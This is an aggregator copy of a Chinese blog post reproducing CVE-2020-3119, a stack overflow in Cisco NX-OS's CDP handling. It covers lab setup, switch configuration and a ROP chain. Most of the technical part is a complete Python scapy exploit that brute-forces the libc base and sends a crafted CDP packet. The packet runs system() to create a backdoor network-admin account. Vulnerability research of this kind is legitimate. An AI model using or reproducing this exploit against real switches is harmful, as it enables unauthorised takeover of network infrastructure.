Cisco CDP cve-2020-3119
source link: https://o0xmuhe.github.io/2020/04/23/Cisco-CDP-cve-2020-3119/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Cisco CDP cve-2020-3119
使用GNS3可以复现漏洞;使用EVE也可以,一个定制化的Linux,提供一个仿真环境,我当时两个方法都测试了,GNS3有点小坑,最后在EVE上测试通过的。
配置的流程其实都一样,进入console启动交换机。
1
2
dir
boot nxos.9.3.2.bin
设置密码 Root1234
配置nexus交换机。
参考这里
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.
switch(config)# interface mgmt0
switch(config-if)# ip address 10.0.2.15/24 <--- NOTE: can use "ip address dhcp" here instead
switch(config-if)in# no shut
switch(config-if)# end
switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.
switch(config)# username vagrant password vagrant role network-admin
switch(config)# username vagrant shell bash
switch(config)# boot nxos bootflash:nxos.7.0.3.I2.2d.bin <--- Note: use correct image name from "dir" command output
switch(config)# copy r s
[########################################] 100%
Copy complete.
switch(config)#
直接反汇编bin有坑,需要gdbdump了看dump。
1
*(&a1->levels + counter) = *(&ptr + counter);// write what where
这里可以任意地址写。
1
2
3
4
5
6
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RPATH: b'/isan/lib/convert:/isan/lib:/isanboot/lib'
1
ret_addr + JUNK + arg1
猜两个地址,stack base和 libc base, 以及heap address?
存在栈上的堆地址怎么用呢?ret过去?
1
2
3
4
5
6
7
8
9
10
11
12
payload = [
struct.pack('<I', 0x0),
'A' * 64,
struct.pack('!h', 0xdeadbeef), # saved ebp
struct.pack('!h', libc_base + pop_ret_offset), # ret addr
struct.pack('!h', libc_base + libc_bss_offset), # a1
struct.pack('!h', libc_base + pop_ret_offset),
struct.pack('!h', 0xdeadbeef),
...
struct.pack('!h', libc_base + system_offset),
struct.pack('!h', 0xdeadbeef),
]
只需要猜system所在libc的基地址。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
junk
saved ebp
ret addr; // pop ret即可
a1
pop ret
junk
pop ret
junk
...
pop ret
junk
system_addr
xxxx
cmd_str_addr
a1只要是一个符合条件的指向data段的指针即可。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from scapy.contrib import cdp
from scapy.all import Ether, LLC, SNAP, sendp
from time import sleep
import struct
offset_to_cmd = 40 # TODO
libc_bss_offset = 0x001B4EE0 + 0x200 # use for a1
system_offset = 0x0003C790 # system func
pr_offset = 0x00021b07 # pop eax; ret
# pppr_offset_offset = 0x000df5d2 # pop ebp ; pop edi ; pop ebx ; ret
ppr_offset_offset = 0x000f5e5a # pop ebp ; pop ebx ; ret
cmd = '/isan/bin/vsh -c "configure terminal ; username test password qweASD123 role network-admin"'
def gen(libc_base):
payload = ""
payload += struct.pack('>I', 0x0) + 'A' * 64
payload += struct.pack('>I', 0x00001337) + struct.pack('>I', libc_base + pr_offset) # saved ebp + ret addr
payload += struct.pack('>I', libc_base + libc_bss_offset) # a1
if offset_to_cmd % 2 == 1:
payload += (struct.pack('>I', libc_base + pr_offset) + struct.pack('>I', 0x00001337)) * offset_to_cmd
else:
payload += struct.pack('>I', libc_base + ppr_offset_offset) + struct.pack('>I', 0x00001337) * 2
payload += (struct.pack('>I', libc_base + pr_offset) + struct.pack('>I', 0x00001337)) * (offset_to_cmd - 3)
payload += struct.pack('>I', libc_base + system_offset) + struct.pack('>I', 0x00001337)
return payload
def exploit(payload):
# link layer
l2_packet = Ether(dst="01:00:0c:cc:cc:cc")
# Logical-Link Control
l2_packet /= LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP()
# Cisco Discovery Protocol
cdp_v2 = cdp.CDPv2_HDR(vers=2, ttl=180)
deviceid = cdp.CDPMsgDeviceID(val=cmd)
portid = cdp.CDPMsgPortID(iface=b"ens38")
address = cdp.CDPMsgAddr(naddr=1, addr=cdp.CDPAddrRecordIPv4(addr="192.168.204.77"))
cap = cdp.CDPMsgCapabilities(cap=1)
power_req = cdp.CDPMsgUnknown19(val=payload)
power_level = cdp.CDPMsgPower(power=16)
cdp_packet = cdp_v2/deviceid/portid/address/cap/power_req/power_level
packet = l2_packet / cdp_packet
sendp(packet)
def main():
assert offset_to_cmd !=0
for libc_base in range(0xf5000000, 0xf5fff000, 0x1000):
try:
print('[*] Exploiting...guess libc on {0}'.format(hex(libc_base)))
payload = gen(libc_base)
exploit(payload)
except Exception as e:
print(e)
sleep(5)
def test():
payload = gen(0xf5dd9000)
exploit(payload)
if __name__ == '__main__':
# main()
test()
reference
Recommend
-
9
Copy link Member Manishearth...
-
15
谈谈 CDP (Contrast Detection Probability) By Jueqin18 Min readIn Blo...
-
6
“你必须拥有良好的消费者数据,以推动成功的营销活动、精...
-
4
Peter Gergen August 16, 2021 9 minute read
-
8
互联网下半场的两个“CDP” 小珠CRM 2021-08-20 0 评论...
-
12
基于阿里云部署的CDP产品详情基于阿里云部署的CDP是部署在阿里云ECS集群上的集成的分析和数据管理平台,在该平台上提供广泛的数据分析和人工智能功能以及安全的用户访问和数据治理功能。作者:Xuefeng Wang
-
13
数据化管理时代,几乎每个企业都在推行业务的精细化运营,新用户的获取,老用户的分层运营。为了提升数据化运营的效率,纷纷自建或外采运营工具。 市面上各自CRM系统、DMP平台层出不穷,后来又有了CDP平台,那这些平台之间...
-
5
导读:随着营销3.0时代的到来,企业愈发需要依托强大CDP能力解决其严重的数据孤岛问题,帮助企业加温线索、促活客户。但什么是CDP、好的CDP应该具备哪些关键特征?本文在回答此问题的同时,详细讲述了爱番番租户级实时CDP建设实...
-
4
云徙科技:爆火的CDP 究竟如何“Carry全场” CDP正变得炙手可热。 无论是权威媒体、自媒体大号或者是研究机...
-
7
营销云的下半场,CDP的过往与未来-鸟哥笔记 在很多私下场合,讨论到CDP环节时,我都会由衷的说一句:“营销云的前半场已经在MA模块决出胜负,下半场的胜负就交给CDP吧!”
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK